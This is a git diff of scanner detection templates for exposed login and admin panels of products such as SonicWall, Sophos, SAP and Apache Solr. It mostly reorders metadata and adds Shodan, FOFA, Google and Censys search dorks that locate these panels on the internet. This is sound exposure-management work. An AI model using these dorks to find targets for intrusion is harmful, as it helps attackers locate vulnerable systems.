ef8d2949fc..73fb6151b5 100644 --- a/http/exposed-panels/sap-netweaver-portal.yaml +++ b/http/exposed-panels/sap-netweaver-portal.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:sap:netweaver_portal:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: netweaver_portal vendor: sap + product: netweaver_portal tags: panel,sap http: diff --git a/http/exposed-panels/sap-successfactors-detect.yaml b/http/exposed-panels/sap-successfactors-detect.yaml index 7068cd28da..9d5968bb93 100644 --- a/http/exposed-panels/sap-successfactors-detect.yaml +++ b/http/exposed-panels/sap-successfactors-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sap:successfactors:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: successfactors - shodan-query: title:"Login - SAP SuccessFactors" - vendor: sap verified: true + max-request: 2 + vendor: sap + product: successfactors + shodan-query: + - title:"Login - SAP SuccessFactors" + - http.title:"login - sap successfactors" + fofa-query: title="login - sap successfactors" + google-query: intitle:"login - sap successfactors" tags: panel,sap,detect http: diff --git a/http/exposed-panels/sapfiori-panel.yaml b/http/exposed-panels/sapfiori-panel.yaml index de1e2e6649..5a1f6970b1 100644 --- a/http/exposed-panels/sapfiori-panel.yaml +++ b/http/exposed-panels/sapfiori-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:sap:fiori:*:*:*:*:erp_hcm:*:*:* metadata: max-request: 2 - product: fiori vendor: sap + product: fiori tags: panel,sap,fiori http: diff --git a/http/exposed-panels/sas-login-panel.yaml b/http/exposed-panels/sas-login-panel.yaml index b229ca26ba..c6d20a4ae0 100644 --- a/http/exposed-panels/sas-login-panel.yaml +++ b/http/exposed-panels/sas-login-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sas:base_sas:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: sas product: base_sas shodan-query: http.favicon.hash:957255151 - vendor: sas - verified: true + fofa-query: icon_hash=957255151 tags: sas,panel http: diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml index bbaa18f382..74044b16b1 100644 --- a/http/exposed-panels/satis-repository.yaml +++ b/http/exposed-panels/satis-repository.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"<a href=\"https://github.com/composer/satis\">Satis</a>" - verified: true tags: panel,exposure,composer,satis http: diff --git a/http/exposed-panels/sauter-moduwebvision-panel.yaml b/http/exposed-panels/sauter-moduwebvision-panel.yaml index 6b59e0bceb..72b2f942c8 100644 --- a/http/exposed-panels/sauter-moduwebvision-panel.yaml +++ b/http/exposed-panels/sauter-moduwebvision-panel.yaml @@ -11,11 +11,12 @@ info: classification: cpe: cpe:2.3:o:sauter:moduweb_vision:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: sauter product: moduweb_vision shodan-query: http.favicon.hash:-1663319756 - vendor: sauter - verified: true + fofa-query: icon_hash=-1663319756 tags: panel,moduweb,sauter,login http: diff --git a/http/exposed-panels/scribble-diffusion-panel.yaml b/http/exposed-panels/scribble-diffusion-panel.yaml index cd82d5f1be..5b855d2234 100644 --- a/http/exposed-panels/scribble-diffusion-panel.yaml +++ b/http/exposed-panels/scribble-diffusion-panel.yaml @@ -10,9 +10,9 @@ info: - https://scribblediffusion.com/ - https://github.com/replicate/scribble-diffusion metadata: + verified: true max-request: 1 shodan-query: title:"Scribble Diffusion" - verified: true tags: panel,scribble,detect http: diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml index e0bee62fed..deb66881f1 100644 --- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml @@ -8,9 +8,9 @@ info: - https://www.scriptcase.com.br - https://www.scriptcase.net metadata: + verified: true max-request: 2 shodan-query: title:"ScriptCase" - verified: true tags: panel,scriptcase http: diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml index 409fdb226b..9f93bb0cec 100644 --- a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml +++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml @@ -8,9 +8,9 @@ info: - https://www.scriptcase.com.br - https://www.scriptcase.net metadata: + verified: true max-request: 2 shodan-query: title:"ScriptCase" - verified: true tags: panel,scriptcase http: diff --git a/http/exposed-panels/seafile-panel.yaml b/http/exposed-panels/seafile-panel.yaml index 5dacf3c210..78d80c6de6 100644 --- a/http/exposed-panels/seafile-panel.yaml +++ b/http/exposed-panels/seafile-panel.yaml @@ -13,11 +13,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: seafile product: seafile shodan-query: http.favicon.hash:1552322396 - vendor: seafile - verified: true + fofa-query: icon_hash=1552322396 tags: sefile,panel,login,seafile http: diff --git a/http/exposed-panels/seagate-nas-login.yaml b/http/exposed-panels/seagate-nas-login.yaml index de1d440413..83a1befd5c 100644 --- a/http/exposed-panels/seagate-nas-login.yaml +++ b/http/exposed-panels/seagate-nas-login.yaml @@ -9,11 +9,15 @@ info: classification: cpe: cpe:2.3:o:seagate:nas_os:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: nas_os - shodan-query: title:"Seagate NAS - SEAGATE" - vendor: seagate verified: true + max-request: 1 + vendor: seagate + product: nas_os + shodan-query: + - title:"Seagate NAS - SEAGATE" + - http.title:"seagate nas - seagate" + fofa-query: title="seagate nas - seagate" + google-query: intitle:"seagate nas - seagate" tags: panel,seagate,login http: diff --git a/http/exposed-panels/securepoint-utm.yaml b/http/exposed-panels/securepoint-utm.yaml index 8449277ba4..3dade8ffe1 100644 --- a/http/exposed-panels/securepoint-utm.yaml +++ b/http/exposed-panels/securepoint-utm.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8" max-request: 1 + fofa-query: app="Securepoint-UTM-v11-Admin-Interface-11.8.8.8" tags: securepoint,panel http: diff --git a/http/exposed-panels/security-onion-panel.yaml b/http/exposed-panels/security-onion-panel.yaml index 3c2307944c..5baefacb5d 100644 --- a/http/exposed-panels/security-onion-panel.yaml +++ b/http/exposed-panels/security-onion-panel.yaml @@ -12,11 +12,15 @@ info: classification: cpe: cpe:2.3:a:securityonionsolutions:security_onion:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: security_onion - shodan-query: title:"Security Onion" - vendor: securityonionsolutions verified: true + max-request: 2 + vendor: securityonionsolutions + product: security_onion + shodan-query: + - title:"Security Onion" + - http.title:"security onion" + fofa-query: title="security onion" + google-query: intitle:"security onion" tags: panel,security,onion,detect,securityonionsolutions http: diff --git a/http/exposed-panels/seeddms-panel.yaml b/http/exposed-panels/seeddms-panel.yaml index ed9b4cdd1b..fb8ccbbbfa 100644 --- a/http/exposed-panels/seeddms-panel.yaml +++ b/http/exposed-panels/seeddms-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:seeddms:seeddms:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: seeddms - shodan-query: http.title:"SeedDMS" vendor: seeddms + product: seeddms + shodan-query: + - http.title:"SeedDMS" + - http.title:"seeddms" + fofa-query: title="seeddms" + google-query: intitle:"seeddms" tags: panel,seeddms,login http: diff --git a/http/exposed-panels/selfcheck-panel.yaml b/http/exposed-panels/selfcheck-panel.yaml index 25f0b92ed4..902c04320f 100644 --- a/http/exposed-panels/selfcheck-panel.yaml +++ b/http/exposed-panels/selfcheck-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=607747024729154&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: title:"SelfCheck System Manager" - verified: true tags: panel,login,selfcheck,systemmanager http: diff --git a/http/exposed-panels/sensu-panel.yaml b/http/exposed-panels/sensu-panel.yaml index 07406e17af..e788b6b0ce 100644 --- a/http/exposed-panels/sensu-panel.yaml +++ b/http/exposed-panels/sensu-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:-749942143 - verified: true tags: panel,sensu,sumo,detect http: diff --git a/http/exposed-panels/sentinelone-console.yaml b/http/exposed-panels/sentinelone-console.yaml index 04f8804a28..a42e103b45 100644 --- a/http/exposed-panels/sentinelone-console.yaml +++ b/http/exposed-panels/sentinelone-console.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"SentinelOne - Management Console" - verified: true tags: panel,sentinelone http: diff --git a/http/exposed-panels/sentry-panel.yaml b/http/exposed-panels/sentry-panel.yaml index 3f83839c75..4b4a63b8f3 100644 --- a/http/exposed-panels/sentry-panel.yaml +++ b/http/exposed-panels/sentry-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:sentry:sentry:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: sentry - shodan-query: http.title:"Login | Sentry" - vendor: sentry verified: true + max-request: 1 + vendor: sentry + product: sentry + shodan-query: + - http.title:"Login | Sentry" + - http.title:"login | sentry" + fofa-query: title="login | sentry" + google-query: intitle:"login | sentry" tags: panel,sentry,login http: diff --git a/http/exposed-panels/servicedesk-login-panel.yaml b/http/exposed-panels/servicedesk-login-panel.yaml index 950e2fcd96..ea27418e3e 100644 --- a/http/exposed-panels/servicedesk-login-panel.yaml +++ b/http/exposed-panels/servicedesk-login-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian + product: confluence_data_center + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + fofa-query: app="atlassian-confluence" tags: servicedesk,confluence,jira,panel,login,atlassian http: diff --git a/http/exposed-panels/servicenow-panel.yaml b/http/exposed-panels/servicenow-panel.yaml index d47d46b38e..6b33e2d9c2 100644 --- a/http/exposed-panels/servicenow-panel.yaml +++ b/http/exposed-panels/servicenow-panel.yaml @@ -11,11 +11,17 @@ info: classification: cpe: cpe:2.3:a:servicenow:servicenow:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: servicenow - shodan-query: http.favicon.hash:1701804003 - vendor: servicenow verified: true + max-request: 1 + vendor: servicenow + product: servicenow + shodan-query: + - http.favicon.hash:1701804003 + - http.title:"servicenow" + fofa-query: + - icon_hash=1701804003 + - title="servicenow" + google-query: intitle:"servicenow" tags: panel,servicenow,login,detect http: diff --git a/http/exposed-panels/sevone-nms-network-manager.yaml b/http/exposed-panels/sevone-nms-network-manager.yaml index 4f4e788d9b..250adc55de 100644 --- a/http/exposed-panels/sevone-nms-network-manager.yaml +++ b/http/exposed-panels/sevone-nms-network-manager.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info metadata: + verified: true max-request: 1 shodan-query: http.title:"SevOne NMS - Network Manager" - verified: true tags: sevone,manager,login,panel http: diff --git a/http/exposed-panels/shardingsphere-panel.yaml b/http/exposed-panels/shardingsphere-panel.yaml index 47f423d646..51f3a7155e 100644 --- a/http/exposed-panels/shardingsphere-panel.yaml +++ b/http/exposed-panels/shardingsphere-panel.yaml @@ -9,11 +9,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: apache product: shardingsphere_elasticjob-ui shodan-query: http.favicon.hash:816588900 - vendor: apache - verified: true + fofa-query: icon_hash=816588900 tags: panel,shardingsphere,login,apache http: diff --git a/http/exposed-panels/sharefile-panel.yaml b/http/exposed-panels/sharefile-panel.yaml index 65374a329a..2478df980e 100644 --- a/http/exposed-panels/sharefile-panel.yaml +++ b/http/exposed-panels/sharefile-panel.yaml @@ -11,11 +11,15 @@ info: classification: cpe: cpe:2.3:a:citrix:sharefile:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: sharefile - shodan-query: title:"ShareFile Login" - vendor: citrix verified: true + max-request: 1 + vendor: citrix + product: sharefile + shodan-query: + - title:"ShareFile Login" + - http.title:"sharefile login" + fofa-query: title="sharefile login" + google-query: intitle:"sharefile login" tags: sharefile,login,panel,detect,citrix http: diff --git a/http/exposed-panels/shell-box.yaml b/http/exposed-panels/shell-box.yaml index 68e0119148..1cc88918cc 100644 --- a/http/exposed-panels/shell-box.yaml +++ b/http/exposed-panels/shell-box.yaml @@ -12,11 +12,12 @@ info: classification: cpe: cpe:2.3:a:shellinabox_project:shellinabox:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: shellinabox_project product: shellinabox shodan-query: http.favicon.hash:-629968763 - vendor: shellinabox_project - verified: true + fofa-query: icon_hash=-629968763 tags: shell,emulator,detect,panel,login,shellinabox_project http: diff --git a/http/exposed-panels/sidekiq-dashboard.yaml b/http/exposed-panels/sidekiq-dashboard.yaml index 2aab862f59..92ecf87cfd 100644 --- a/http/exposed-panels/sidekiq-dashboard.yaml +++ b/http/exposed-panels/sidekiq-dashboard.yaml @@ -16,8 +16,11 @@ info: cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sidekiq vendor: contribsys + product: sidekiq + fofa-query: title="sidekiq" + shodan-query: http.title:"sidekiq" + google-query: intitle:"sidekiq" tags: unauth,panel,sidekiq,contribsys http: diff --git a/http/exposed-panels/signet-explorer-dashboard.yaml b/http/exposed-panels/signet-explorer-dashboard.yaml index a50f9799e2..49dabc216e 100644 --- a/http/exposed-panels/signet-explorer-dashboard.yaml +++ b/http/exposed-panels/signet-explorer-dashboard.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: html:"mempool-space" || title:"Signet Explorer" - verified: true tags: panel,signet,bitcoin,dashboard http: diff --git a/http/exposed-panels/sitefinity-login.yaml b/http/exposed-panels/sitefinity-login.yaml index 524d45556c..f09fa6fbf7 100644 --- a/http/exposed-panels/sitefinity-login.yaml +++ b/http/exposed-panels/sitefinity-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:progress:sitefinity_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sitefinity_cms vendor: progress + product: sitefinity_cms tags: sitefinity,edb,panel,progress http: diff --git a/http/exposed-panels/siteomat-login.yaml b/http/exposed-panels/siteomat-login.yaml index 956438c33a..5cf5f92aed 100644 --- a/http/exposed-panels/siteomat-login.yaml +++ b/http/exposed-panels/siteomat-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:orpak:siteomat:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: siteomat vendor: orpak + product: siteomat tags: siteomat,login,edb,panel,orpak http: diff --git a/http/exposed-panels/skeepers-panel.yaml b/http/exposed-panels/skeepers-panel.yaml index 4a162a2d4e..dd9524e70c 100644 --- a/http/exposed-panels/skeepers-panel.yaml +++ b/http/exposed-panels/skeepers-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://skeepers.io metadata: + verified: true max-request: 2 shodan-query: http.title:"Skeepers" - verified: true tags: panel,skeepers,login,detect http: diff --git a/http/exposed-panels/skycaiji-admin-panel.yaml b/http/exposed-panels/skycaiji-admin-panel.yaml index 7f14f6e474..a961dd6520 100644 --- a/http/exposed-panels/skycaiji-admin-panel.yaml +++ b/http/exposed-panels/skycaiji-admin-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:skycaiji:skycaiji:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: skycaiji vendor: skycaiji + product: skycaiji tags: panel,tech,skycaiji http: diff --git a/http/exposed-panels/smartping-dashboard.yaml b/http/exposed-panels/smartping-dashboard.yaml index a92522e173..e9c8ade363 100644 --- a/http/exposed-panels/smartping-dashboard.yaml +++ b/http/exposed-panels/smartping-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"SmartPing Dashboard" - verified: true tags: panel,misconfig,unauth,smartping http: diff --git a/http/exposed-panels/snapcomms-panel.yaml b/http/exposed-panels/snapcomms-panel.yaml index 0ddab742e0..a782ad2091 100644 --- a/http/exposed-panels/snapcomms-panel.yaml +++ b/http/exposed-panels/snapcomms-panel.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.snapcomms.com/ metadata: - max-request: 1 verified: true + max-request: 1 tags: panel,snapcomms,login,detect http: diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml index 3581b61723..5df5fdf7d4 100644 --- a/http/exposed-panels/softether-vpn-panel.yaml +++ b/http/exposed-panels/softether-vpn-panel.yaml @@ -7,9 +7,9 @@ info: description: | SoftEther VPN panel was detected. metadata: + verified: true max-request: 1 shodan-query: http.title:"SoftEther VPN Server" - verified: true tags: panel,vpn,softether http: diff --git a/http/exposed-panels/solarview-compact-panel.yaml b/http/exposed-panels/solarview-compact-panel.yaml index 324622097d..fa7425662d 100644 --- a/http/exposed-panels/solarview-compact-panel.yaml +++ b/http/exposed-panels/solarview-compact-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: solarview_compact_firmware - shodan-query: http.html:"SolarView Compact" - vendor: contec verified: true + max-request: 1 + vendor: contec + product: solarview_compact_firmware + shodan-query: + - http.html:"SolarView Compact" + - http.favicon.hash:"-244067125" + - http.html:"solarview compact" + - cpe:"cpe:2.3:o:contec:solarview_compact_firmware" + fofa-query: + - body="solarview compact" && title="top" + - icon_hash="-244067125" + - body="solarview compact" tags: panel,solarview,iot,contec http: diff --git a/http/exposed-panels/solarwinds-arm-panel.yaml b/http/exposed-panels/solarwinds-arm-panel.yaml index d93c0d7d4c..7a9df70de9 100644 --- a/http/exposed-panels/solarwinds-arm-panel.yaml +++ b/http/exposed-panels/solarwinds-arm-panel.yaml @@ -13,12 +13,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:solarwinds:access_rights_manager:*:*:*:*:*:*:*:* metadata: - censys-query: services.http.response.html_title="Solarwinds Access Rights Manager" + verified: true max-request: 1 + vendor: solarwinds product: access_rights_manager shodan-query: http.favicon.hash:-1416464161 - vendor: solarwinds - verified: true + censys-query: + - services.http.response.html_title="Solarwinds Access Rights Manager" + - services.http.response.html_title="solarwinds access rights manager" + fofa-query: icon_hash=-1416464161 tags: panel,solarwinds http: diff --git a/http/exposed-panels/solarwinds-orion.yaml b/http/exposed-panels/solarwinds-orion.yaml index ec03dd23eb..5a64bded24 100644 --- a/http/exposed-panels/solarwinds-orion.yaml +++ b/http/exposed-panels/solarwinds-orion.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:solarwinds:orion_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: orion_platform vendor: solarwinds + product: orion_platform tags: panel,solarwinds http: diff --git a/http/exposed-panels/solarwinds-servuftp-detect.yaml b/http/exposed-panels/solarwinds-servuftp-detect.yaml index 683c2f1593..e7e1592d69 100644 --- a/http/exposed-panels/solarwinds-servuftp-detect.yaml +++ b/http/exposed-panels/solarwinds-servuftp-detect.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: serv-u vendor: solarwinds + product: serv-u + shodan-query: product:"rhinosoft serv-u httpd" tags: solarwinds,panel http: diff --git a/http/exposed-panels/solr-panel-exposure.yaml b/http/exposed-panels/solr-panel-exposure.yaml index c060702704..98e9728983 100644 --- a/http/exposed-panels/solr-panel-exposure.yaml +++ b/http/exposed-panels/solr-panel-exposure.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: solr - shodan-query: http.title:"Solr Admin" - vendor: apache verified: true + max-request: 2 + vendor: apache + product: solr + shodan-query: + - http.title:"Solr Admin" + - http.title:"apache solr" + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: panel,solr,apache,admin http: diff --git a/http/exposed-panels/somansa-dlp-detect.yaml b/http/exposed-panels/somansa-dlp-detect.yaml index 21a32ddeec..f5a04e3233 100644 --- a/http/exposed-panels/somansa-dlp-detect.yaml +++ b/http/exposed-panels/somansa-dlp-detect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.html:"DLP system" - verified: true tags: panel,somansa,dlp http: diff --git a/http/exposed-panels/sonarqube-login.yaml b/http/exposed-panels/sonarqube-login.yaml index c337aada02..6d53c49294 100644 --- a/http/exposed-panels/sonarqube-login.yaml +++ b/http/exposed-panels/sonarqube-login.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:sonarsource:sonarqube:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sonarqube vendor: sonarsource + product: sonarqube tags: panel,sonarqube,sonarsource http: diff --git a/http/exposed-panels/sonic-wall-application.yaml b/http/exposed-panels/sonic-wall-application.yaml index 02f6633269..5c94261047 100644 --- a/http/exposed-panels/sonic-wall-application.yaml +++ b/http/exposed-panels/sonic-wall-application.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: sma1000_firmware - shodan-query: title:"Appliance Management Console Login" - vendor: sonicwall verified: true + max-request: 1 + vendor: sonicwall + product: sma1000_firmware + shodan-query: + - title:"Appliance Management Console Login" + - http.title:"appliance management console login" + fofa-query: title="appliance management console login" + google-query: intitle:"appliance management console login" tags: panel,sonicwall,login http: diff --git a/http/exposed-panels/sonic-wall-login.yaml b/http/exposed-panels/sonic-wall-login.yaml index 861eaba5b2..c85ce07efe 100644 --- a/http/exposed-panels/sonic-wall-login.yaml +++ b/http/exposed-panels/sonic-wall-login.yaml @@ -8,11 +8,15 @@ info: classification: cpe: cpe:2.3:h:sonicwall:tz_350:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: tz_350 - shodan-query: title:"SonicWall Network Security Login" - vendor: sonicwall verified: true + max-request: 2 + vendor: sonicwall + product: tz_350 + shodan-query: + - title:"SonicWall Network Security Login" + - http.title:"sonicwall network security login" + fofa-query: title="sonicwall network security login" + google-query: intitle:"sonicwall network security login" tags: panel,sonicwall,login http: diff --git a/http/exposed-panels/sonicwall-analyzer-login.yaml b/http/exposed-panels/sonicwall-analyzer-login.yaml index d01072ea61..aac436660b 100644 --- a/http/exposed-panels/sonicwall-analyzer-login.yaml +++ b/http/exposed-panels/sonicwall-analyzer-login.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:sonicwall:analyzer:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: analyzer - shodan-query: title:"SonicWall Analyzer Login" - vendor: sonicwall verified: true + max-request: 1 + vendor: sonicwall + product: analyzer + shodan-query: + - title:"SonicWall Analyzer Login" + - http.title:"sonicwall analyzer login" + fofa-query: title="sonicwall analyzer login" + google-query: intitle:"sonicwall analyzer login" tags: panel,sonicwall http: diff --git a/http/exposed-panels/sonicwall-management-panel.yaml b/http/exposed-panels/sonicwall-management-panel.yaml index 8ba44b9b16..51eceb106c 100644 --- a/http/exposed-panels/sonicwall-management-panel.yaml +++ b/http/exposed-panels/sonicwall-management-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:sonicwall:global_management_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: global_management_system vendor: sonicwall + product: global_management_system tags: panel,sonicwall http: diff --git a/http/exposed-panels/sonicwall-sslvpn-panel.yaml b/http/exposed-panels/sonicwall-sslvpn-panel.yaml index 7ed9675df7..ebfd8f66c0 100644 --- a/http/exposed-panels/sonicwall-sslvpn-panel.yaml +++ b/http/exposed-panels/sonicwall-sslvpn-panel.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:o:sonicwall:sonicos:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sonicos vendor: sonicwall + product: sonicos + google-query: inurl:"auth.html" intitle:"sonicwall" tags: panel,sonicwall http: diff --git a/http/exposed-panels/sophos-fw-version-detect.yaml b/http/exposed-panels/sophos-fw-version-detect.yaml index 387fcaa646..fb22704c37 100644 --- a/http/exposed-panels/sophos-fw-version-detect.yaml +++ b/http/exposed-panels/sophos-fw-version-detect.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: sfos - shodan-query: title:"Sophos" - vendor: sophos verified: true + max-request: 2 + vendor: sophos + product: sfos + shodan-query: + - title:"Sophos" + - http.title:"sophos" + fofa-query: title="sophos" + google-query: intitle:"sophos" tags: panel,sophos http: diff --git a/http/exposed-panels/sophos-mobile-panel.yaml b/http/exposed-panels/sophos-mobile-panel.yaml index e791de2d9b..2ecc48e0c6 100644 --- a/http/exposed-panels/sophos-mobile-panel.yaml +++ b/http/exposed-panels/sophos-mobile-panel.yaml @@ -14,9 +14,16 @@ info: cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: mobile - shodan-query: http.title:"Sophos Mobile" vendor: sophos + product: mobile + shodan-query: + - http.title:"Sophos Mobile" + - http.title:"sophos mobile" + - http.favicon.hash:-1274798165 + fofa-query: + - icon_hash=-1274798165 + - title="sophos mobile" + google-query: intitle:"sophos mobile" tags: panel,sophos http: diff --git a/http/exposed-panels/sophos-web-appliance.yaml b/http/exposed-panels/sophos-web-appliance.yaml index 30b0317fa4..e791ba2e69 100644 --- a/http/exposed-panels/sophos-web-appliance.yaml +++ b/http/exposed-panels/sophos-web-appliance.yaml @@ -9,11 +9,17 @@ info: classification: cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: web_appliance - shodan-query: http.favicon.hash:-893681401 - vendor: sophos verified: true + max-request: 1 + vendor: sophos + product: web_appliance + shodan-query: + - http.favicon.hash:-893681401 + - http.title:"sophos web appliance" + fofa-query: + - title="sophos web appliance" + - icon_hash=-893681401 + google-query: intitle:"sophos web appliance" tags: panel,login,sophos http: diff --git a/http/exposed-panels/spacelogic-cbus-panel.yaml b/http/exposed-panels/spacelogic-cbus-panel.yaml index 722c0231f9..9b9bd4c8ed 100644 --- a/http/exposed-panels/spacelogic-cbus-panel.yaml +++ b/http/exposed-panels/spacelogic-cbus-panel.yaml @@ -5,11 +5,14 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 - product: spacelogic_c-bus_home_controller_firmware - shodan-query: html:"SpaceLogic C-Bus" - vendor: schneider-electric verified: true + max-request: 1 + vendor: schneider-electric + product: spacelogic_c-bus_home_controller_firmware + shodan-query: + - html:"SpaceLogic C-Bus" + - http.html:"spacelogic c-bus" + fofa-query: body="spacelogic c-bus" tags: panel,spacelogic,login,schneider-electric http: diff --git a/http/exposed-panels/spark-panel.yaml b/http/exposed-panels/spark-panel.yaml index 2339b87459..5669c53cac 100644 --- a/http/exposed-panels/spark-panel.yaml +++ b/http/exposed-panels/spark-panel.yaml @@ -12,11 +12,18 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: spark - shodan-query: html:"/apps/IMT/Html/" - vendor: apache verified: true + max-request: 1 + vendor: apache + product: spark + shodan-query: + - html:"/apps/IMT/Html/" + - http.html:"/apps/imt/html/" + - http.title:"spark master at" + fofa-query: + - title="spark master at" + - body="/apps/imt/html/" + google-query: intitle:"spark master at" tags: panel,spark,apache http: diff --git a/http/exposed-panels/speedtest-panel.yaml b/http/exposed-panels/speedtest-panel.yaml index 15fe5b0c12..0cfcd76e16 100644 --- a/http/exposed-panels/speedtest-panel.yaml +++ b/http/exposed-panels/speedtest-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/alexjustesen/speedtest-tracker - https://docs.speedtest-tracker.dev/ metadata: + verified: true max-request: 1 shodan-query: title:"Speedtest Tracker" - verified: true tags: speedtest,tracker,panel,login http: diff --git a/http/exposed-panels/sphider-login.yaml b/http/exposed-panels/sphider-login.yaml index b12e3e5db9..c4c3714f5e 100644 --- a/http/exposed-panels/sphider-login.yaml +++ b/http/exposed-panels/sphider-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:sphider:sphider:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: sphider vendor: sphider 